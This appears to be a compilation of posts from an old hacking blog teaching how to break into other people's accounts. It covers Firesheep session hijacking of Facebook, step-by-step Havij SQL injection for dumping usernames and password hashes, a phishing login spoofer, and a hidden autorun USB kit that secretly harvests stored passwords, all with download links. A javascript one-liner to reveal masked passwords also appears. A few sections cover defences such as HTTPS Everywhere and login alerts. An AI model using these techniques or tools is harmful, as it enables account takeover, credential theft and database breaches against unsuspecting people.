Born 4 Revolute

How to Hack Facebook Account in a Second

Let me introduce you to a Firefox addon called firesheep. What FireSheep does is it hi-jacks other peoples session and lets you use it. For instance close to all sites on the web store cookies on their servers. Now I am not talking about the chocolate chip type of cookies. Nope, these cookies save your preferred settings for sites, while other cookies have your username and password on them.to download the firesheep go to the link

http://codebutler.github.com/firesheep/

firesheep program is only compatible with firefox earlier version 3 and below.To break into someones account just open up FireSheep, click ‘Start Capturing’ and it will list all the users in your network that are currently logged on. For instance sites like GMail, Yahoo and Facebook will most likely appear.

So all you would have to do to is double click on a name or icon in FireSheep and I can access your account. All I did was steal your cookies and tricked the site into allowing me to log in.

From here I can do what ever I want. Post on your wall, message someone, or if I wanted even change your password. All this without me ever knowing what your password was and without leaving a trace.

Now before you go bashing on FireSheep, the creator of made it to warn sites like Facebook to cover holes in the sites and to stop HTTP session hi-jacking. Even though people might use it for wrong, that was not the original intention for it.

How To Protect Yourself

Like I said people will use FireSheep for the wrong things. So how do you protect yourself?

These is a Firefox addon called HTTPS Everywhere which encrypts your connection. For instance when you visit websites you are visiting them unencrypted or unprotected. This is because your visiting sites using HTTP. But, for example on websites where you have to enter private info (e.g Credit Cards, Social Security) they change HTTP to HTTPS.

What this basically means is that no one will be able to steal your info because its secure and encrypted.

Hopefully that all made sense, if not ask me your questions in the comment section below.

Conclusion

Now you know how to hack a Facebook account and how to protect yourself. Keep note that FireSheep does not limit itself to only FB so make sure to install the HTTPS Everywhere addon to make sure your everything’s good.

Well to make the Sql injection easier for you I would be using a tool Havij.Its has both a free version and and a paid version.In this tutorial I will be demonstrating how to use the free version of Havij.The success rate for this tool is more then 94% on the vulnerable website.

It is automated tool for SQL injection for penetration testers to check whether a website is vulnerable to SQL injection or not.All you need to do is to enter the URL of the site that you want to test for the vulnerability and click on ANALYZE button.It will automatically scan the website for Sql Injection.

Below is the download link for Havij

http://www.4shared.com/file/-flDoYIA/Havij_114.html

Here are the feature of Havij.

Supported Databases with injection methods:
a. MsSQL 2000/2005 with error
b. MsSQL 2000/2005 no error (union based)
c. MySQL (union based)
d. MySQL Blind
e. MySQL error based
f. Oracle (union based)
g. MsAccess (union based)
Automatic database detection
Automatic type detection (string or integer)
Automatic keyword detection (finding difference between the positive and negative
Trying different injection syntaxes
Proxy support
Real time result
Options for replacing space by /**/,+,… against IDS or filters
Avoid using strings (magic_quotes similar filters bypass)
Bypassing illegal union
Full customizable http headers (like referer and user agent)
Load cookie from site for authentication
Guessing tables and columns in mysql<5 (also in blind) and MsAccess
Fast getting tables and columns for mysql
Multi thread Admin page finder
Multi thread Online MD5 cracker
Getting DBMS Informations
Getting tables, columns and data
Command executation (mssql only)
Reading system files (mysql only)
Insert/update/delete data

What Havij can do for you ?

By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

Hey guys , Messenpass is a Password Recovery tool that revealed the password of the following instant messenger application.

* MSN Messenger
* Windows Messenger (In Windows XP)
* Windows Live Messenger (In Windows XP/Vista/7)
* Yahoo Messenger (Versions 5.x and 6.x)
* Google Talk
* ICQ Lite 4.x/5.x/2003
* AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
* Trillian
* Trillian Astra
* Miranda
* GAIM/Pidgin
* MySpace IM
* PaltalkScene
* Digsby

MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.

You can download the tool clicking the link

http://www.4shared.com/file/jDG6COeb/Instant_messenger_password_rec.html

Enjoy!!!!!!!

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard --
qwerty itself,asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or
reversing the order of the letters.and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.
Check Your Password Strength

3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Enjoy!!!!!!

Java Code that enable for write in any website

javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0

How to use the code:-

1 first you have to open a website on your browser (ie www.websms.ntc.net.np)

2 then in the address bar you have to put the java code and hit enter

3 Enjoy!!!!!!!!


Java Script that reveal the Passwords hidden behind Asterisk (*****)

javascript: alert(document.getElementById('Passwd').value);

How to use the code :-

1 Open the login page of any website. mostly worked in internet explorer
(ie http://yahoo.mail.com)

2 Type your username and password

3 copy and paste the javascript code given into your browser address bar and press Enter
4 As soon as you press Enter , A Window pops up showing password typed by you

5 Enjoy!!!!!!

Here the Tools to download the Fake Login Page Maker (Login Spoofer) you have to download and in a second you can make a fake login page with the tools.with the help of the tools you can make any fake login page .download link is below

http://www.4shared.com/file/fBAsxHsq/login_spoofer__1_.html



Enjoy!!!!!!!!!!!!

The Usb Hack To Be More Confortable And Undetected For Use..
This Is 100% Secured And Contains No Virus..
First Of All Download This File:

http://www.4shared.com/file/wNYmp9zo/USB_Hacks.html

Then Extract And You Will Get These Files:
1.autorun.inf
2.ChromePass.exe
3.iepv.exe
4.launch.bat
5.mailpv.exe
6.mspass.exe
7.PasswordFox.exe
8.usb.vbs

Now You Must Make A Backup From The Autorun.inf From Your Usb And Then Delete It..
Copy All The 8 Files To Usb And Then Select Them All And Go To Right Click>Properties>Check "Hidden" And Click Apply>Ok
Then The Files Will Be Hidden
When you plug in the usb a blank cmd(it was a cmd saying saving passes and could make the owner understand it but edited doesnt) comes up and is copying all the passwords to 5 .txt files that will come up.It is also edited to make the computer cannot see the hidden files so if the owner opens the usb will see only .txt documents and not the 8 files mentioned above.

It Steals:
* MSN Messenger
* Windows Messenger (Xp Only)
* Windows Live Messenger (Xp+Vista)
* Yahoo Messenger (v5,6)
* Google Talk
* ICQ Lite v4.v5.v2003
* AOL Instant Messenger v4.6 or below, AIM v6. and AIM Pro.
* Trillian
* Miranda
* GAIM/Pidgin
* MySpace IM
* PaltalkScene
* Digsby
* Outlook Express
* Microsoft Outlook 2000 (POP3,SMTP)
* Microsoft Outlook 2002/2003/2007 (POP3,IMAP,HTTP,SMTP)
* Windows Mail
* Windows Live Mail
* IncrediMail
* Eudora
* Netscape v6,v7 (Password Not Master Encrypted)
* Mozilla Thunderbird (Password Not Master Encrypted)
* Group Mail Free
* Yahoo! Mail - (Passwords Saved In Yahoo Messenger Application)
* Hotmail/MSN mail - (Passwords Saved In MSN/Windows/Live Messenger Application)
* Gmail - (Passwords Saved By Gmail Notifier Application,Google Desktop,or Google Talk)
* Internet Explorer 4,6,7 & 8 Beta Stored Usernames+Passwords
* Outlook passwords
* AutoComplete passwords in Ie

So You Just Plug-In The Usb And A Blank Cmd Box Doing Proccesses Come Up.Then It Hides The .exe which was doing the hacking proccesses and leaves only the .txt with the accounts..
Remove the usb
enjoy !!!!!!!!

Mozilla Firefox has been known for having the most tight security system.The Password manager is very tight, powerful and user friendly one. You can store all your username and password in firefox and when you forget the ID or pass for a site, you can refer to the password manager to get the password but what to do if you have forgotten the password for Mozilla Firefox password manager.

There is a way to reset your password. But also keep one thing in mind that resetting the master password will clear all your saved username and password from it. firefox password manager will automatically start storing your username and passwords again in process after the password reset.

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is

65.189.252.125.
That is be the IP address of the sender!
5. Track the IP address of the sender

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.63.138.100
That is be the IP address of the sender!
6. Track the IP address of the sender

Finding IP address in Hotmail

1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [59.138.0.8]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [59.138.0.8] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender

Enjoy!!!

HOW TO: Get Notified When Someone Hacks Your Facebook

When you’re logged into Facebook, you’ll see the word “Account” in the top right corner of the browser window. Click there to get a drop-down menu of options, then click on “Account Settings,” as pictured below.



You’ll end up looking at a page that lists ways you can customize your account, including “Name,” “Password,” “Linked Accounts” and “more.” As long as you don’t navigate away from the “Settings” tab, you’ll see “Account Security” close to the bottom of the list. Click “change” on the right to show the following option:

Check “Yes” when you see the prompt, “Would you like to receive notifications for logins from new devices?” Then click “Save.” The feature is turned on. Now we’ll show you how to use it.

Step 2: Log In and Register Your Computer

The settings won’t be customizable until you register the computer you’re logged in with, so you’ll have to first log out and then log back in. You can do this from the “Accounts” button in the top-right corner, as we mentioned before. When you log in again, you’ll see a screen titled “Register this computer.”

Type the name of the computer in (it can be anything you want as long as it’s something you’ll recognize and remember), and choose whether you want Facebook to remember this computer or not.

Facebook suggests a good rule of thumb: If the computer is a public one (like one you’d use at a library, a shared work computer or a machine in your school’s computer lab), leave the box unchecked so it will have to be registered each time a new login occurs, leading to an e-mail or text notification.

If it’s a machine you use every day, then go ahead and check the box; you probably don’t want to receive an email every time you log into Facebook from a safe place!

Now that your computer is registered, you can see more options when you revisit the “Account Settings” page where you first enabled the notifications. You’ll see a history of registrations; it won’t record every time you log into a computer that’s already registered, but it will record every new registration, which should include at least the first time any hacker logs in.

You can check or uncheck the option to have the immediate notifications sent to your cell phone via text message in addition to the basic email option.

Click the link to download the tools which is given below

http://itsecteam.com/files/Havij%201.10.rar

Open havij and copy and paste infected link as shown in figure



Now click in the "Analyze"



Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx



Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed



After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure



In that Just put mark username and password and click "Get data"

Bingo Got now id and pass that may be admin...

The pass will get as md5 you can crack it also using this tool as shown in figure...



Happy Hacking guys......................